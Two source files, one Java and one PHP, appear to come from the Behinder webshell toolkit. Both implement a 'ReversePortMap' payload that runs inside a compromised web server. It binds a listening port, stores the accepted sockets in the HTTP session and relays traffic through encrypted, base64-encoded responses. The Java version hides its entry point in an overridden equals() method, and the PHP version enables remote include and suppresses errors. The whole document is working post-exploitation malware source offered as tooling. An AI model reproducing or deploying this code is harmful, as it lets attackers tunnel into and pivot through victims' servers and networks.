File: src/main/java/net/rebeyond/behinder/payload/java/ReversePortMap.java
package net.rebeyond.behinder.payload.java;

import java.io.ByteArrayOutputStream;
import java.lang.reflect.Method;
import java.net.InetSocketAddress;
import java.nio.ByteBuffer;
import java.nio.channels.ServerSocketChannel;
import java.nio.channels.SocketChannel;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Enumeration;
import java.util.HashMap;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import java.util.Random;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;

public class ReversePortMap implements Runnable {
   public static String action;
   public static String listenPort;
   public static String socketHash;
   public static String extraData;
   private Object Request;
   private Object Response;
   private Object Session;
   private String threadType;
   private Map paramMap;

   public boolean equals(Object obj) {
      HashMap result = new HashMap();
      boolean var20 = false;

      Object so;
      Method write;
      label253: {
         try {
            var20 = true;
            this.fillContext(obj);
            Map paramMap = new HashMap();
            paramMap.put("request", this.Request);
            paramMap.put("response", this.Response);
            paramMap.put("session", this.Session);
            if (action.equals("create")) {
               String serverSocketHash = "reverseportmap_server_" + listenPort;
               paramMap.put("serverSocketHash", serverSocketHash);
               paramMap.put("listenPort", listenPort);
               ServerSocketChannel serverSocketChannel = ServerSocketChannel.open();
               serverSocketChannel.bind(new InetSocketAddress(Integer.parseInt(listenPort)));
               this.sessionSetAttribute(this.Session, serverSocketHash, serverSocketChannel);
               serverSocketChannel.socket().setReuseAddress(true);
               (new Thread(new ReversePortMap("daemon", paramMap))).start();
               result.put("status", "success");
               result.put("msg", "success");
               var20 = false;
            } else if (action.equals("list")) {
               List socketList = new ArrayList();
               Enumeration keys = this.sessionGetAttributeNames(this.Session);

               while(keys.hasMoreElements()) {
                  String socketHash = keys.nextElement().toString();
                  if (socketHash.indexOf("reverseportmap") >= 0) {
                     Map socketObj = new HashMap();
                     socketObj.put("socketHash", socketHash);
                     socketList.add(socketObj);
                  }
               }

               result.put("status", "success");
               result.put("msg", this.buildJsonArray(socketList, false));
               var20 = false;
            } else {
               SocketChannel serverInnersocket;
               ByteBuffer buf;
               if (action.equals("read")) {
                  serverInnersocket = (SocketChannel)this.sessionGetAttribute(this.Session, ReversePortMap.socketHash);
                  serverInnersocket.configureBlocking(false);
                  ByteArrayOutputStream bos = new ByteArrayOutputStream();
                  buf = ByteBuffer.allocate(512);

                  int length;
                  for(length = serverInnersocket.read(buf); length > 0; length = serverInnersocket.read(buf)) {
                     byte[] data = Arrays.copyOfRange(buf.array(), 0, length);
                     buf.clear();
                     bos.write(data);
                  }

                  if (length == -1) {
                     serverInnersocket.close();
                  }

                  result.put("status", "success");
                  result.put("msg", base64encode(bos.toByteArray()));
                  var20 = false;
               } else if (action.equals("write")) {
                  serverInnersocket = (SocketChannel)this.sessionGetAttribute(this.Session, ReversePortMap.socketHash);
                  byte[] extraDataByte = this.base64decode(extraData);
                  buf = ByteBuffer.allocate(extraDataByte.length);
                  buf.clear();
                  buf.put(extraDataByte);
                  buf.flip();

                  while(buf.hasRemaining()) {
                     serverInnersocket.write(buf);
                  }

                  result.put("status", "success");
                  result.put("msg", "ok");
                  var20 = false;
               } else if (!action.equals("stop")) {
                  if (action.equals("close")) {
                     try {
                        serverInnersocket = (SocketChannel)this.sessionGetAttribute(this.Session, ReversePortMap.socketHash);
                        serverInnersocket.close();
                        this.sessionRemoveAttribute(this.Session, ReversePortMap.socketHash);
                     } catch (Exception var24) {
                        var24.printStackTrace();
                     }

                     result.put("status", "success");
                     result.put("msg", "服务侧Socket资源已释放。");
                     var20 = false;
                  } else {
                     var20 = false;
                  }
               } else {
                  Enumeration keys = this.sessionGetAttributeNames(this.Session);

                  String socketHash;
                  while(keys.hasMoreElements()) {
                     socketHash = keys.nextElement().toString();
                     if (socketHash.startsWith("reverseportmap_socket_" + listenPort)) {
                        try {
                           serverInnersocket = (SocketChannel)this.sessionGetAttribute(this.Session, socketHash);
                           this.sessionRemoveAttribute(this.Session, socketHash);
                           serverInnersocket.close();
                        } catch (Exception var26) {
                           var26.printStackTrace();
                        }
                     }
                  }

                  try {
                     socketHash = "reverseportmap_server_" + listenPort;
                     ServerSocketChannel serverSocket = (ServerSocketChannel)this.sessionGetAttribute(this.Session, socketHash);
                     this.sessionRemoveAttribute(this.Session, socketHash);
                     serverSocket.close();
                  } catch (Exception var25) {
                  }

                  result.put("status", "success");
                  result.put("msg", "服务侧Socket资源已释放。");
                  var20 = false;
               }
            }
            break label253;
         } catch (Exception var27) {
            result.put("status", "fail");
            result.put("msg", action + ":" + var27.getMessage());
            var20 = false;
         } finally {
            if (var20) {
               try {
                  so = this.Response.getClass().getMethod("getOutputStream").invoke(this.Response);
                  write = so.getClass().getMethod("write", byte[].class);
                  write.invoke(so, this.Encrypt(this.buildJson(result, true).getBytes("UTF-8")));
                  so.getClass().getMethod("flush").invoke(so);
                  so.getClass().getMethod("close").invoke(so);
               } catch (Exception var21) {
                  var21.printStackTrace();
               }

            }
         }

         try {
            so = this.Response.getClass().getMethod("getOutputStream").invoke(this.Response);
            write = so.getClass().getMethod("write", byte[].class);
            write.invoke(so, this.Encrypt(this.buildJson(result, true).getBytes("UTF-8")));
            so.getClass().getMethod("flush").invoke(so);
            so.getClass().getMethod("close").invoke(so);
         } catch (Exception var22) {
            var22.printStackTrace();
         }

         return true;
      }

      try {
         so = this.Response.getClass().getMethod("getOutputStream").invoke(this.Response);
         write = so.getClass().getMethod("write", byte[].class);
         write.invoke(so, this.Encrypt(this.buildJson(result, true).getBytes("UTF-8")));
         so.getClass().getMethod("flush").invoke(so);
         so.getClass().getMethod("close").invoke(so);
      } catch (Exception var23) {
         var23.printStackTrace();
      }

      return true;
   }

   public ReversePortMap(String threadType, Map paramMap) {
      this.threadType = threadType;
      this.paramMap = paramMap;
   }

   public ReversePortMap() {
   }

   public void run() {
      if (this.threadType.equals("daemon")) {
         try {
            Object session = this.paramMap.get("session");
            String serverSocketHash = this.paramMap.get("serverSocketHash").toString();
            ServerSocketChannel serverSocketChannel = (ServerSocketChannel)this.sessionGetAttribute(session, serverSocketHash);
            String listenPort = this.paramMap.get("listenPort").toString();

            while(true) {
               try {
                  SocketChannel serverInnersocket = serverSocketChannel.accept();
                  Map paramMap = new HashMap();
                  paramMap.put("session", session);
                  String serverInnersocketHash = "reverseportmap_socket_" + listenPort + "_" + serverInnersocket.socket().getInetAddress().getHostAddress() + "_" + serverInnersocket.socket().getPort();
                  paramMap.put("serverInnersocketHash", serverInnersocketHash);
                  this.sessionSetAttribute(session, serverInnersocketHash, serverInnersocket);
               } catch (Exception var8) {
                  break;
               }
            }
         } catch (Exception var9) {
            var9.printStackTrace();
         }
      }

   }

   private void fillContext(Object obj) throws Exception {
      if (obj.getClass().getName().indexOf("PageContext") >= 0) {
         this.Request = obj.getClass().getMethod("getRequest").invoke(obj);
         this.Response = obj.getClass().getMethod("getResponse").invoke(obj);
         this.Session = obj.getClass().getMethod("getSession").invoke(obj);
      } else {
         Map objMap = (Map)obj;
         this.Session = objMap.get("session");
         this.Response = objMap.get("response");
         this.Request = objMap.get("request");
      }

      this.Response.getClass().getMethod("setCharacterEncoding", String.class).invoke(this.Response, "UTF-8");
   }

   private String buildJson(Map entity, boolean encode) throws Exception {
      StringBuilder sb = new StringBuilder();
      String version = System.getProperty("java.version");
      sb.append("{");
      Iterator var5 = entity.keySet().iterator();

      while(var5.hasNext()) {
         String key = (String)var5.next();
         sb.append("\"" + key + "\":\"");
         String value = ((String)entity.get(key)).toString();
         if (encode) {
            Class Base64;
            Object Encoder;
            if (version.compareTo("1.9") >= 0) {
               this.getClass();
               Base64 = Class.forName("java.util.Base64");
               Encoder = Base64.getMethod("getEncoder", (Class[])null).invoke(Base64, (Object[])null);
               value = (String)Encoder.getClass().getMethod("encodeToString", byte[].class).invoke(Encoder, value.getBytes("UTF-8"));
            } else {
               this.getClass();
               Base64 = Class.forName("sun.misc.BASE64Encoder");
               Encoder = Base64.newInstance();
               value = (String)Encoder.getClass().getMethod("encode", byte[].class).invoke(Encoder, value.getBytes("UTF-8"));
               value = value.replace("\n", "").replace("\r", "");
            }
         }

         sb.append(value);
         sb.append("\",");
      }

      if (sb.toString().endsWith(",")) {
         sb.setLength(sb.length() - 1);
      }

      sb.append("}");
      return sb.toString();
   }

   private byte[] base64decode(String base64Text) throws Exception {
      String version = System.getProperty("java.version");
      byte[] result;
      Class Base64;
      Object Decoder;
      if (version.compareTo("1.9") >= 0) {
         this.getClass();
         Base64 = Class.forName("java.util.Base64");
         Decoder = Base64.getMethod("getDecoder", (Class[])null).invoke(Base64, (Object[])null);
         result = (byte[])((byte[])Decoder.getClass().getMethod("decode", String.class).invoke(Decoder, base64Text));
      } else {
         this.getClass();
         Base64 = Class.forName("sun.misc.BASE64Decoder");
         Decoder = Base64.newInstance();
         result = (byte[])((byte[])Decoder.getClass().getMethod("decodeBuffer", String.class).invoke(Decoder, base64Text));
      }

      return result;
   }

   private static String base64encode(byte[] content) throws Exception {
      String result = "";
      String version = System.getProperty("java.version");
      Class Base64;
      Object Encoder;
      if (version.compareTo("1.9") >= 0) {
         Base64 = Class.forName("java.util.Base64");
         Encoder = Base64.getMethod("getEncoder", (Class[])null).invoke(Base64, (Object[])null);
         result = (String)Encoder.getClass().getMethod("encodeToString", byte[].class).invoke(Encoder, content);
      } else {
         Base64 = Class.forName("sun.misc.BASE64Encoder");
         Encoder = Base64.newInstance();
         result = (String)Encoder.getClass().getMethod("encode", byte[].class).invoke(Encoder, content);
         result = result.replace("\n", "").replace("\r", "");
      }

      return result;
   }

   private String buildJsonArray(List list, boolean encode) throws Exception {
      StringBuilder sb = new StringBuilder();
      sb.append("[");
      Iterator var4 = list.iterator();

      while(var4.hasNext()) {
         Map entity = (Map)var4.next();
         sb.append(this.buildJson(entity, encode) + ",");
      }

      if (sb.toString().endsWith(",")) {
         sb.setLength(sb.length() - 1);
      }

      sb.append("]");
      return sb.toString();
   }

   private byte[] Encrypt(byte[] bs) throws Exception {
      String key = this.Session.getClass().getMethod("getAttribute", String.class).invoke(this.Session, "u").toString();
      byte[] raw = key.getBytes("utf-8");
      SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
      Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
      cipher.init(1, skeySpec);
      byte[] encrypted = cipher.doFinal(bs);
      return encrypted;
   }

   private Object sessionGetAttribute(Object session, String key) {
      Object result = null;

      try {
         result = session.getClass().getMethod("getAttribute", String.class).invoke(session, key);
      } catch (Exception var5) {
      }

      return result;
   }

   private void sessionSetAttribute(Object session, String key, Object value) {
      try {
         session.getClass().getMethod("setAttribute", String.class, Object.class).invoke(session, key, value);
      } catch (Exception var5) {
      }

   }

   private Enumeration sessionGetAttributeNames(Object session) {
      Enumeration result = null;

      try {
         result = (Enumeration)session.getClass().getMethod("getAttributeNames").invoke(session);
      } catch (Exception var4) {
      }

      return result;
   }

   private void sessionRemoveAttribute(Object session, String key) {
      try {
         session.getClass().getMethod("removeAttribute").invoke(session, key);
      } catch (Exception var4) {
      }

   }

   private byte[] getMagic() throws Exception {
      String key = this.Session.getClass().getMethod("getAttribute", String.class).invoke(this.Session, "u").toString();
      int magicNum = Integer.parseInt(key.substring(0, 2), 16) % 16;
      Random random = new Random();
      byte[] buf = new byte[magicNum];

      for(int i = 0; i < buf.length; ++i) {
         buf[i] = (byte)random.nextInt(256);
      }

      return buf;
   }
}

File: src/main/java/net/rebeyond/behinder/payload/php/ReversePortMap.php
@error_reporting(0);
@set_time_limit(0);
function main($action, $listenPort = "", $socketHash = "", $extraData = "MTIz")
{
    $result = array();
    ini_set("allow_url_fopen", true);
    ini_set("allow_url_include", true);
    if (function_exists('dl')) {
        dl("php_sockets.dll");
    }
    switch ($action) {
        case "create":
            $serverSocket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
            socket_set_option($serverSocket, SOL_SOCKET, SO_REUSEPORT, 1);
            $bind = socket_bind($serverSocket, "0.0.0.0", $listenPort);
            if (!$bind) {
                $result["status"] = base64_encode("fail");
                $result["msg"] = base64_encode(socket_strerror($serverSocket));
                echo encrypt(json_encode($result), $_SESSION['k']);
                return;
            }

            $listen = socket_listen($serverSocket);
            if (!$listen) {
                $result["status"] = base64_encode("fail");
                $result["msg"] = base64_encode(socket_strerror($listen));
                echo encrypt(json_encode($result), $_SESSION['k']);
                return;
            }
            socket_set_nonblock($serverSocket);
            $serverSocketHash = "reverseportmap_server_" . $listenPort;
            @session_start();
            $_SESSION[$serverSocketHash] = $serverSocket;
            $_SESSION["running".$listenPort] = true;
            session_write_close();


            /*ob_end_clean();
            header("Connection: close");
            ignore_user_abort();
            ob_start();
            $result["status"] = base64_encode("success");
            $result["msg"] = base64_encode("success");
            echo encrypt(json_encode($result), $_SESSION['k']);
            $size = ob_get_length();
            header("Content-Length: $size");
            ob_end_flush();
            flush();*/

            $clients = array();
            $read=array();
            $write = array();
            $exp = array();
            while ($_SESSION["running".$listenPort]) {

                $serverInnerSocket = socket_accept($serverSocket);
                if ($serverInnerSocket !== false) {
                    socket_getpeername($serverInnerSocket, $address, $port);
                    $serverInnersocketHash = "reverseportmap_socket_" . $listenPort . "_" . $address . "_" . $port;
                     @session_start();
                                            $_SESSION[$serverInnersocketHash]="socket";
                                            session_write_close();

                    socket_set_nonblock($serverInnerSocket);
                    $clients[] = $serverInnerSocket;
                }
                $read = $clients;

                $write = $clients;

                if (socket_select($read, $write, $exp, null) > 0) {
                    foreach ($read as $socket_item) {
                        socket_getpeername($socket_item, $address, $port);
                        $serverInnersocketReadHash = "reverseportmap_socket_" . $listenPort . "_" . $address . "_" . $port . "_read";
                        $readContent = "";
                        $content = socket_read($socket_item, 2048);
                        while(strlen($content)>0)
                        {
                            $readContent=$readContent.$content;
                            $content = socket_read($socket_item, 2048);
                        }
                        @session_start();
                        $_SESSION[$serverInnersocketReadHash]=$_SESSION[$serverInnersocketReadHash].$readContent;
                        session_write_close();
                    }
                    foreach ($write as $socket_item) {
                        socket_getpeername($socket_item, $address, $port);
                        $serverInnersocketWriteHash = "reverseportmap_socket_" . $listenPort . "_" . $address . "_" . $port . "_write";
                        @session_start();
                        $writeContent=$_SESSION[$serverInnersocketWriteHash];
                        if (strlen($writeContent)>0)
                        {
                        $count=socket_write($socket_item, $writeContent, strlen($writeContent));
                        }
                        $_SESSION[$serverInnersocketWriteHash]="";
                        session_write_close();


                    }
                }
            }
            break;
        case "list":
            $socketList = array();
             @session_start();
            foreach ($_SESSION as $key => $val) {
                if (strstr($key, "reverseportmap")) {
                    if ($_SESSION[$key]!="socket")
                    {
                      continue;
                    }
                    $socketObj = array(
                        "socketHash" => $key
                    );
                    array_push($socketList, $socketObj);
                }
            }
             session_write_close();
            $result["status"] = base64_encode("success");
            $result["msg"] = base64_encode(json_encode($socketList));
            echo encrypt(json_encode($result), $_SESSION['k']);
            return;
        case "read":
            $socketReadHash=$socketHash."_read";
            @session_start();
            if (isset($_SESSION[$socketReadHash])) {
                $readContent=$_SESSION[$socketReadHash];
                $_SESSION[$socketReadHash]="";
                session_write_close();
                echo $readContent;
                return;
            } else {
                //echo "\x37\x21\x49\x36RemoteSocket read failed";
                return;
            }
        case "write":
            $socketWriteHash=$socketHash."_write";
            $rawPostData = base64_decode($extraData);
            if ($rawPostData) {
                @session_start();
                $_SESSION[$socketWriteHash]=$_SESSION[$socketWriteHash].$rawPostData;
                session_write_close();
                header("Connection: Keep-Alive");
            } else {
                echo "\x37\x21\x49\x36RemoteSocket write failed";
            }
            return;
        case "stop":
            $socketHashList = array();
            @session_start();
            foreach ($_SESSION as $key => $val) {
                if (strstr($key, "reverseportmap_socket_" . $listenPort)) {
                    $socketHashList[] = $key;
                }
            }
            session_write_close();
            foreach ($socketHashList as $key) {
                @session_start();
                unset($_SESSION[$key]);
                session_write_close();
            }
            $serverSocketHash = "reverseportmap_server_" . $listenPort;
            @session_start();
            unset($_SESSION[$serverSocketHash]);
             $_SESSION["running".$listenPort] = false;
             session_write_close();
            $result["status"] = base64_encode("success");
            $result["msg"] = base64_encode("服务侧Socket资源已释放。");
            echo encrypt(json_encode($result), $_SESSION['k']);
            return;
        case "close":
            socket_close($_SESSION[$socketHash]);
            unset($_SESSION[$socketHash]);
            $result["status"] = base64_encode("success");
            $result["msg"] = base64_encode("服务侧Socket资源已释放。");
            echo encrypt(json_encode($result), $_SESSION['k']);
            return;
        default: {
            }
    }
}
function encrypt($data, $key)
{
    if (!extension_loaded('openssl')) {
        for ($i = 0; $i < strlen($data); $i++) {
            $data[$i] = $data[$i] ^ $key[$i + 1 & 15];
        }
        return $data;
    } else {
        return openssl_encrypt($data, "AES128", $key);
    }
}
